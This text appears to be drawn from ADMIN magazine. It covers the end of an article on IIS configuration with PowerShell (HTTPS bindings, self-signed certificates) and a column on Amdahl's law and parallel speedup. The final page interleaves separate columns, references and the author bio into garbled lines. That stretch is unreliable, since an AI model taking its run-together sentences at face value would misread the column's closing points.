New-WebBinding -Name '<Site name>' -IPAddress * -Port 443 -Protocol https

The two Get- commands mentioned earlier then show the successful binding (Figure 5). In PowerShell, you can also output the bindings specifically for a website,

(Get-Website -Name '<Default Website>').bindings.Collection

as shown in Figure 5.

Self-Signed Certificates

For connection security, IIS also supports self-signed certificates with the New-SelfSignedCertificate cmdlet. To create a self-signed certificate for a web page (Figure 5), type:

New-SelfSignedCertificate -CertStoreLocation '<Cert:\LocalMachine\My>' -DnsName '<s2.joos.int>'

Figure 5: You can issue and assign self-signed certificates in PowerShell.

The certificate is then connected to the website and requires the fingerprint of the certificate, which is displayed during the create process:

$certPath = 'Cert:<\LocalMachine\My\>CEC247<...>CCC4'
$providerPath = 'IIS:\SSLBindings\0.0.0.0!443'
Get-Item $certPath | New-Item $providerPath

You can also check the bindings in IIS Manager or with Windows Admin Center. To do so, call up the settings of the website and check to see whether the certificate has been accepted and the settings have been set. In Windows Admin Center, you will find the options under Bindings.
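You can also confirm from any client which certificate the HTTPS binding actually serves with Python's ssl module. This is just a sketch; verification is switched off because the certificate is self-signed, and the hostname is the example used above:

# Sketch: fetch the certificate that the HTTPS binding presents.
import socket, ssl

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE   # accept the self-signed certificate

with socket.create_connection(("s2.joos.int", 443)) as raw:
    with ctx.wrap_socket(raw, server_hostname="s2.joos.int") as tls:
        der = tls.getpeercert(binary_form=True)
        print(ssl.DER_cert_to_PEM_cert(der)[:130])  # PEM header + start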
IIS in Windows Server 2016 and 2019 also supports HTTP/2, and you can use wildcards for the host header:

New-WebBinding -Name "Default Web Site" -IPAddress "*" -Port 80 -HostHeader "*.contoso.com"

If you want to prevent the web server from advertising itself externally as an IIS 10 server, enter

Set-WebConfigurationProperty -pspath 'MACHINE/WEBROOT/APPHOST' -filter "system.webServer/security/requestFiltering" -name "removeServerHeader" -value "True"

to remove the server header.

Conclusions

IIS can be configured in several ways. Not surprisingly, PowerShell is one of them, which allows you to save actions as scripts and execute them repeatedly and, if necessary, automatically. The second common approach is from Windows Admin Center. IIS Manager, on the other hand, is no longer the tool of choice. Regardless of which tool you choose, the motto has to be: security first!

Info
[1] IIS extension for Windows Admin Center: https://github.com/microsoft/IIS.Administration/releases
[2] URL Rewrite: https://www.iis.net/downloads/microsoft/url-rewrite

The Author
Thomas Joos is a freelance IT consultant and has been working in IT for more than 20 years. In addition, he writes hands-on books and papers on Windows and other Microsoft topics. Online you can meet him on http://thomasjoos.spaces.live.com.
NUTS AND BOLTS: Performance Tuning Dojo

Planning performance without running binaries

Blade Runner

We examine some mathemagical tools that approximate time-to-execute given the parallelizable segment of code. By Federico Lucifredi
Usually the task of a performance engineer involves running a workload, finding its first bottleneck with a profiling tool, eliminating it (or at least minimizing it), and then repeating this cycle – up until a desired performance level is attained. However, sometimes the question is posed from the reverse angle: Given existing code that requires a certain amount of time to execute (e.g., 10 minutes), what would it take to run it 10 times faster? Can it be done? Answering these questions is easier than you would think.

Parallel Processing

The typical parallel computing workload breaks down a problem in discrete chunks to be run simultaneously on different CPU cores. A classic example is approximating the value of pi. Many algorithms that numerically approximate pi are known, variously attributed to Euler, Ramanujan, Newton, and others. Their meaning, not their mathematical derivation, is of concern here. A simple approximation is given by Equation 1.

\pi = \int_0^1 \frac{4}{1 + x^2}\,dx \qquad (1)

The assertion is that pi is equal to the area under the curve in Figure 1. Numerical integration solves this equation computationally, rather than analytically, by slicing this space into an infinite number of infinitesimal rectangles and summing their areas.

Figure 1: Approximating pi by numerical integration of the area under the curve.

This scenario is an ideal parallel numerical challenge, as computing one rectangle's area has no data dependency whatsoever with that of any other. The more the slices, the higher the precision. You just need to throw CPUs at the problem: in this case, 5 million loops to reach 48 decimal places of accuracy.

This way of approximating pi is not very efficient, but it uses a very simple algorithm to implement in both linear and parallel coding styles. Carlos Morrison published a message passing interface (MPI) [1] pi implementation [2] in his book Build Supercomputers with Raspberry Pi 3 [3].
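To make the slicing concrete, here is a minimal serial sketch in Python. I am assuming the classic integrand 4/(1 + x²) on [0, 1] used by the common MPI pi demos; note that ordinary double precision delivers far fewer digits than the 48 quoted above:

# Sketch: midpoint-rule approximation of pi with 5 million slices.
n = 5_000_000
width = 1.0 / n
total = 0.0
for i in range(n):
    x = (i + 0.5) * width           # midpoint of slice i
    total += 4.0 / (1.0 + x * x)    # height of the rectangle
print(total * width)                # 3.14159265358...

The parallel version simply hands each rank a subrange of i and sums the partial results, which is why the problem partitions so cleanly.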

Speed Limit

Can you make the code twice as fast? Sure! Can you make it 10 times faster? Maybe. That factor, 2x or 10x, is called speedup in computing (Equation 2).

a = \frac{T_{\text{original}}}{T_{\text{new}}} \qquad (2)

Speedup is defined as the ratio of the original and new (hopefully improved) measurements, so if your code used
to take one second to execute and now takes half a second, you have a 2x speedup. Speedup measures for latency or throughput – today I am using the latency formulation.

Amdahl's law [4] observes that parallelism only accelerates a fraction of the application's code, putting a limit on its effect. Ideally, speedup would be linear, with a doubling of processing resources consistently halving the compute time, and so on indefinitely. Unfortunately, few algorithms can deliver on this promise (see the "Embarrassingly Parallel Algorithms" box); most algorithms approximate linear speedup over a few CPUs and essentially decay into constant time with many CPUs.

Embarrassingly Parallel Algorithms

An algorithm is considered "embarrassingly parallel" [5] when no design effort is required to partition the problem into completely separate parts. If no data dependency exists between the problem subparts, no communication coordination (and corresponding computational stall) ever takes place, making the problem trivial to partition. Of course, there is nothing embarrassing about using these algorithms – quite the contrary, it is the hallmark of good architecture. Some examples of algorithms in this class, among others, are:

• Numerical integration – by slice
• Monte Carlo methods – by sample
• The Mandelbrot set – by function point
• Ray tracing or other computer graphics rendering – by frame or ray
• Genetic algorithms – by genotype
• Convolutional neural networks – by filter
• Computer simulation – by scenario

Choosing an efficient parallel algorithm is essential to achieving good return on your hardware or computer time investment.

For example, if your code takes 20 minutes to execute and just one minute of it can't be parallelized, you can tell up front, without knowing any other details about the problem, that the maximum speedup theoretically possible is 20x (Equation 3),

a_{\max} = \frac{1}{1 - p} = \frac{1}{0.05} = 20 \qquad (3)

which is derived by observing that you can use as many CPUs as you want to drive 95 percent of the problem asymptotically to zero time (p=0.95), and you will be left with that one minute (1 - p=0.05). Once you do the math (1/0.05=20), that is the maximum possible speedup under ideal conditions (i.e., the absolute limit with infinite resources thrown at the problem).

Amdahl's Law

IBM's Gene Amdahl contributed the law bearing his name in 1967, coupling the previous observation with the simple fact that you generally do not have infinite horsepower to drive the parallel section of the code to zero time (Equation 4).

a = \frac{1}{(1 - p) + p/s} \qquad (4)

Amdahl's observation factors in the speedup of the parallel section. The new term p/s is the ratio of time spent in the parallel section of the code and the speedup it achieves. Continuing with the 20-minute example, say you have accelerated the now-parallel section of the code with a 4x speedup, and you find that the resulting speedup for the whole program is 3.47x (Equation 5):

a = \frac{1}{(1 - 0.95) + 0.95/4} = \frac{1}{0.2875} \approx 3.47 \qquad (5)
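The arithmetic behind Equation 5 is a one-liner if you want to sanity-check it; this sketch just plugs in the values from the running example:

# Sketch: Equation 4 with p = 0.95 and a 4x parallel-section speedup.
p, s = 0.95, 4.0
print(1.0 / ((1.0 - p) + p / s))   # 3.478..., the 3.47x quoted above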
There are some important observations to be made here. First, accelerating code is usually about removing bottlenecks, not absolute speedup numbers for the whole codebase. Second, given more resources, you will usually process more data or do more work. Gustafson's law [6] provides an alternative formulation: If more resources are made available, larger problems can be solved within the same time, as opposed to Amdahl's law, which analyzes how a fixed workload can be accelerated by adding more resources. Keep these points in mind and remember that, in the real world, network communication is always a distributed system's presumptive bottleneck.

Roy Batty's Tears

The power of Amdahl's law is found in its analytical insight. Code is measured in time, not in lines, so some minimal performance testing is still required. If you determine that only 50 percent of an algorithm's critical section can be parallelized, its theoretical speedup can't exceed 2x, as you see in Figure 2. Furthermore, it's not practical to use more than 12 cores to run this code, because it can attain more than 90 percent of the maximum theoretical speedup with 12 cores (a 1.84x speedup). You know this before attempting any optimization, saving you effort if the best possible result is inadequate to achieving your aims.

Figure 2: Maximum theoretical speedup with 50 percent serial code.
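The Figure 2 numbers are equally quick to reproduce. In this sketch, Equation 4 is evaluated with the core count standing in for the parallel-section speedup:

# Sketch: p = 0.5, 12 cores; compare against the 2x ceiling.
a = 1.0 / (0.5 + 0.5 / 12)
print(round(a, 3), round(a / 2.0, 3))  # 1.846 and 0.923 (>90% of 2x)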
N U TS A N D B O LTS Performance Tuning Dojo

In an alternative scenario with only Without invoking the C-beams speech Info
five percent serial code in the bottle- or even going near the Tannhäuser [1] MPI: [https://www.mpi‑forum.org/docs/]
neck (Figure 3), the asymptote is at Gate [7], one must point out parallel- [2] MPI pi implementation:
20x speedup. In other words, if you ism’s massive overhead, already obvious [https://github.com/PacktPublishing/
can successfully parallelize 95 per- from the examples here. Execution time Build‑Supercomputers‑with‑Raspberry‑Pi‑3/
cent of the problem, under ideal cir- can be significantly reduced, yet you blob/master/Chapter02/03_MPI_08_b.c]
cumstances the maximum speedup accomplish this by throwing resources [3] Morrison, Carlos. Build Supercomputers
for that problem is 20x. This handy at the problem – perhaps suboptimally. with Raspberry Pi 3. Pakt Publishing, 2016
analysis tool can quickly determine On the other hand, one could argue [4] Amdahl’s law:
what can be accomplished by accel- that idle CPU cores would not be doing [https://webhome.phy.duke.edu/~rgb/
erating code for a problem of fixed anything productive. All those cycles Beowulf/beowulf_book/beowulf_book/
size. would be lost … like tears in rain. n node21.html]
[5] Embarrassingly parallel algorithms:
[https://en.wikipedia.org/wiki/
Embarrassingly_parallel]
[6] Gustafson’s law: [https://en.wikipedia.org/
wiki/Gustafson%27s_law]
[7] Tears in rain monologue from Blade
Runner: [https://en.wikipedia.org/wiki/
Tears_in_rain_monologue]

The Author
Federico Lucifredi (@0xf2) is the Product Man‑
agement Director for Ceph Storage at Red Hat
and was formerly the Ubuntu Server Product
Manager at Canonical and the Linux “Systems
Management Czar” at SUSE. He enjoys arcane
hardware issues and shell‑scripting mysteries
and takes his McFlurry shaken, not stirred. You
Figure 3: Theoretical speedup with five percent serial code. The lower curve is from Figure can read more from him in the new O’Reilly title
2 for comparison. AWS System Administration.

96 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
